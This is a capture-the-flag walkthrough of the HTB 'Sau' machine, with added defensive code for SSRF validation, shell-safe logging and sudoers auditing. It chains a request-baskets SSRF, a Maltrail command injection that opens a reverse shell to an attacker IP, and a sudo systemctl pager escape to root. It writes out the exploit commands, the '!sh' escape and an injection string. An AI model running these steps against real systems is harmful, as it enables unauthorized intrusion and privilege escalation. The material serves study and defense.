True unfreedom is the cage you build inside your own heart.


htb-Sau (study)

Target machine IP: 10.10.11.224

About Sau

“Sau” is an Easy difficulty Linux machine. It runs a “Request Baskets” instance that is vulnerable to server-side request forgery (SSRF), tracked as CVE-2023-27163. Through that SSRF we reach a “Maltrail” instance with an unauthenticated OS command injection vulnerability, which gives us a reverse shell on the machine as the “puma” user. Finally, a “sudo” misconfiguration lets us obtain a “root” shell.

task1 What is the highest TCP port open on the target machine?

55555

nmap -sT 10.10.11.224

(screenshot of the nmap output)

task2 What open-source software supports the application on port 55555?

nmap -p55555 -sV 10.10.11.224

Access the application on 55555

http://10.10.11.224:55555/web

(screenshot of the request-baskets web UI)

request-baskets

task3 What version of request-baskets is running on Sau?

From the screenshot in task2, the running version of request-baskets is 1.2.1.

task4 What is the CVE number for the SSRF vulnerability in request-baskets?

You can find it by searching the application name along with the version number on Google.

(screenshot of the search result)

CVE-2023-27163

task5 What software supports the application running on port 80?

Here we need to reach the target's port 80 through the SSRF vulnerability, since that port is not reachable directly from the nmap scan.

(screenshot)

Reference: https://sploitus.com/exploit?id=6BAA524E-16EA-562C-804B-113B8244C6EA; this script uses the SSRF to proxy traffic to the target's port 80.

wget https://raw.githubusercontent.com/Rubioo02/CVE-2023-27163/main/CVE-2023-27163.sh
chmod +x CVE-2023-27163.sh
./CVE-2023-27163.sh -t <TARGET_URL> -a <ATTACKER_URL>

(screenshot of the script output)

Open the link the script returns, http://10.10.11.224:55555/vxctgy; as the screenshot shows, it serves the Maltrail application.

(screenshots of the Maltrail page)
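The root cause on the request-baskets side is that a basket's forward URL is fetched by the server without any restriction on where it may point, so an internal service such as the Maltrail instance on port 80 becomes reachable from outside. As an added example that is not part of this write-up and not request-baskets' own code, the block below shows the kind of validation a proxying feature should apply before it fetches a user-supplied URL: only http(s), no credentials in the URL, and every address the host resolves to must be globally routable. The `resolve` parameter, the function names and the sample URLs are assumptions made for the example.

```python
# Added example (not request-baskets' own code): validate a user-supplied
# forward URL before a server-side component fetches it. Rejects anything
# that points at loopback, private, link-local or other non-routable space,
# which is exactly where the SSRF in the write-up lands (the target's own
# port 80).
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:127.0.0.1 is IPv6 on the wire but loopback in effect.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def resolve_host(host: str) -> list:
    """Every address the host maps to; IP literals pass through unchanged."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        pass
    # getaddrinfo also accepts shorthand such as "127.1" or "0x7f000001",
    # so forms that slip past a naive string filter still end up checked.
    infos = socket.getaddrinfo(host, None)
    return sorted({info[4][0] for info in infos})


def forward_url_is_safe(url: str, resolve=resolve_host) -> bool:
    """Return True only when every address behind the URL is public.

    `resolve` is injectable so the check can be unit-tested offline and so a
    caller can pin the resolved address for the actual fetch (re-resolving at
    connect time would reopen the check to DNS rebinding).
    """
    try:
        parts = urlsplit(url)
    except ValueError:          # malformed bracketed IPv6 literal and the like
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False            # http://user@host forms are a common confusion vector
    try:
        addrs = resolve(parts.hostname)
    except (socket.gaierror, ValueError, OSError):
        return False
    return bool(addrs) and all(is_public_address(a) for a in addrs)


if __name__ == "__main__":
    # Sample inputs constructed for the example; all are IP literals so no DNS is needed.
    for candidate in ("http://10.10.11.224:80/login",
                      "http://[::ffff:127.0.0.1]/",
                      "http://8.8.8.8/"):
        print(candidate, "->", "allow" if forward_url_is_safe(candidate) else "block")
```

The check must be applied to the address actually used for the connection: validating a hostname and then letting the HTTP client resolve it again gives a rebinding window, which is why the resolver is a parameter rather than a hidden call.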

task6 There is an unauthenticated command injection vulnerability in Maltrail v0.53. Find the path to exploit it.

Powered by Maltrail (v0.53)

Try enumerating directories.

(screenshot of the directory enumeration)

Trying the candidates, the answer is /login. The PoC confirms it: https://github.com/josephberger/Maltrail-v0.53-RCE/blob/main/exploit.py

task7 On Sau, under what system user does the Maltrail application run?

Use the script from https://github.com/josephberger/Maltrail-v0.53-RCE/blob/main/exploit.py for RCE.

python3 exploit.py 10.10.14.10 1234 http://10.10.11.224:55555/vxctgy

On the nc listener:

(screenshot of the reverse shell)

It is the puma user.
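The Maltrail issue is a classic shell-string injection: a value taken from the request ends up inside a command line that is handed to a shell. As an added example that is not Maltrail's code and not part of this write-up, the block below puts a constructed vulnerable pattern beside a hardened version that passes the value as a single argv element to a child process (a Python child echoing its argument stands in for `logger`, so the example runs anywhere), plus an allow-list check on the username as defence in depth. The function names, the regex and the sample usernames are assumptions made for the example.

```python
# Added example, not Maltrail's code: logging a failed login two ways.
# The vulnerable form splices untrusted input into a shell string; the
# hardened form never involves a shell, so metacharacters carry no meaning.
import re
import subprocess
import sys

# Allow-list for the username field; assumption for the example.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")


def build_shell_command(username: str) -> str:
    """Constructed VULNERABLE pattern: untrusted input spliced into a string
    that is later handed to a shell (shell=True / os.system). Returned as a
    string only so the contrast is visible; it is never executed here."""
    return "logger -t demo 'Failed login for %s'" % username


def username_is_acceptable(username: str) -> bool:
    """Reject the field before it reaches any sink. This is defence in depth;
    the real fix is the argv form below, not input filtering."""
    return USERNAME_RE.fullmatch(username) is not None


def log_failed_login_hardened(username: str) -> str:
    """Pass the message as ONE argv element with no shell in the path.
    A Python child that echoes sys.argv[1] stands in for `logger` so the
    example runs without syslog; the return value is what the child received."""
    message = "Failed login for " + username
    argv = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", message]
    completed = subprocess.run(argv, capture_output=True, text=True, check=True)
    return completed.stdout


if __name__ == "__main__":
    # Constructed sample inputs: a normal username and one carrying shell syntax.
    for name in ("puma", "puma'; id; '"):
        print("allow-list accepts:", username_is_acceptable(name))
        print("shell string would be:", build_shell_command(name))
        print("argv form received:", repr(log_failed_login_hardened(name)))
```

The second sample shows why quoting inside the string is not a fix: a single quote in the input closes the literal and the rest of the value becomes shell syntax, whereas the argv form delivers the whole value, quote and all, as one argument.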

Submit the user’s flag.

(screenshot)

task9 What is the full path of the binary that the puma user can run as root on Sau (without parameters)?

/usr/bin/systemctl

(screenshot)

task10 What is the full version string of the systemd instance installed on Sau?

(screenshot)

systemd 245 (245.4-4ubuntu3.22)

task11 This version of systemd has a CVE for privilege escalation. What is the CVE number?

CVE-2023-26604

Reference: https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7

Submit the root’s flag.

sudo /usr/bin/systemctl status trail.service

Then, from the pager that systemctl opens for its output, spawn a shell:

!sh

(screenshot)
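Two conditions combine for the root step: a sudo rule lets puma run systemctl as root, and the installed systemd predates v247, the release from which systemctl sets `LESSSECURE=1` when it spawns the pager with elevated privileges, which is what CVE-2023-26604 tracks. The following audit script is an added example, not part of this write-up or of HTB: it parses sudoers lines and a `systemctl --version` banner and flags that combination. The sample rules are constructed for the example and are not the target's real sudoers; the list of paging subcommands and the function names are assumptions.

```python
# Added example (not part of the write-up or of HTB): flag sudo rules that
# let a user run a pager-spawning systemd command as root, and a systemd
# version old enough to lack the LESSSECURE=1 hardening (CVE-2023-26604).
import re

# systemctl subcommands that hand output to a pager unless --no-pager is
# given. Assumption made for the example; extend it for your environment.
PAGING_SYSTEMCTL_SUBCOMMANDS = {"status", "cat", "list-units", "list-unit-files",
                                "list-timers", "list-dependencies"}
FIXED_MAJOR = 247  # systemd >= 247 sets LESSSECURE=1 when paging as root

SUDOERS_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_systemd_version(banner: str):
    """Major version from a `systemctl --version` banner such as 'systemd 245 (...)'."""
    m = re.match(r"systemd\s+(\d+)", banner.strip())
    return int(m.group(1)) if m else None


def systemd_pager_vulnerable(banner: str) -> bool:
    """True when the banner reports a systemd older than the fixed release."""
    major = parse_systemd_version(banner)
    return major is not None and major < FIXED_MAJOR


def command_may_page(cmd: str) -> bool:
    """Does this sudoers command spec let the invoked program open a pager?"""
    argv = cmd.split()
    if not argv or "--no-pager" in argv:
        return False
    base = argv[0].rsplit("/", 1)[-1]
    if base == "journalctl":
        return True                     # pages by default for nearly every invocation
    if base == "systemctl":
        args = [a for a in argv[1:] if not a.startswith("-")]
        # A bare "systemctl" lets the user pick the subcommand, so treat it as paging.
        return not args or args[0] in PAGING_SYSTEMCTL_SUBCOMMANDS
    return False


def pager_escape_rules(sudoers_lines):
    """(user, command) pairs whose sudo rule runs a pager-spawning command."""
    findings = []
    for raw in sudoers_lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if command_may_page(cmd):
                findings.append((m.group("user"), cmd))
    return findings


# Constructed sample; NOT the target's real sudoers.
SAMPLE_SUDOERS = [
    "Defaults env_reset",
    "puma ALL=(ALL) NOPASSWD: /usr/bin/systemctl status trail.service",
    "ops  ALL=(ALL) NOPASSWD: /usr/bin/systemctl --no-pager status trail.service",
    "ops  ALL=(root) /usr/bin/journalctl -u trail.service, /usr/bin/systemctl restart trail.service",
]
SAMPLE_BANNER = "systemd 245 (245.4-4ubuntu3.22)"  # version string from the write-up


if __name__ == "__main__":
    print("systemd pager issue present:", systemd_pager_vulnerable(SAMPLE_BANNER))
    for user, cmd in pager_escape_rules(SAMPLE_SUDOERS):
        print(f"{user}: '{cmd}' can open a pager as root; add --no-pager or drop the rule")
```

Either finding alone is worth fixing: pinning `--no-pager` in the rule removes the pager regardless of the systemd version, and upgrading systemd closes the escape even where an operator later adds a looser rule.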
